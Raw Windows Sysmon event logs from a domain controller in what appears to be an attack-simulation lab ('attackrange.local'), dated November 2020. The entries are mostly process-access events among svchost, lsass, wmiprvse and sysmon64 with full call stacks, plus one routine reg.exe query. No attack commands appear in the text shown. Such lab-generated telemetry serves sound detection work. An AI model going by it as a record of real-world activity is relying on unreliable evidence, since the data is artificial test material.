15:52:00.353{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002878Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:00.322{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002877Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:00.322{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002876Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:00.322{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002875Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:00.055{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002874Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:00.055{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002873Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:00.055{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003057Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:01.825{D28789B6-7CA1-5FA1-8E00-000000008801}27644356C:\Windows\system32\conhost.exe{D28789B6-7CA1-5FA1-9000-000000008801}2608C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003056Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:01.825{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003055Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:01.825{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003054Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:01.825{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003053Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:01.825{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003052Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:01.825{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003051Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:01.825{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003050Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:01.825{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003049Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:01.825{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003048Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:01.825{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003047Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:01.825{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7CA1-5FA1-9000-000000008801}2608C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003046Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:01.825{D28789B6-7CA1-5FA1-8F00-000000008801}23122480C:\Windows\system32\cmd.exe{D28789B6-7CA1-5FA1-9000-000000008801}2608C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003045Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:01.824{D28789B6-7CA1-5FA1-9000-000000008801}2608C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exeC:\Windows\system32\reg.exe query hklm\software\microsoft\windows\softwareinventorylogging /v collectionstate /reg:64C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{D28789B6-7CA1-5FA1-8F00-000000008801}2312C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\system32\reg.exe query hklm\software\microsoft\windows\softwareinventorylogging /v collectionstate /reg:64 10341000x80000000000000003044Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:01.810{D28789B6-7CA1-5FA1-8E00-000000008801}27644356C:\Windows\system32\conhost.exe{D28789B6-7CA1-5FA1-8F00-000000008801}2312C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003043Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:01.810{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003042Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:01.810{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003041Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:01.810{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003040Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:01.810{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003039Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:01.810{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003038Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 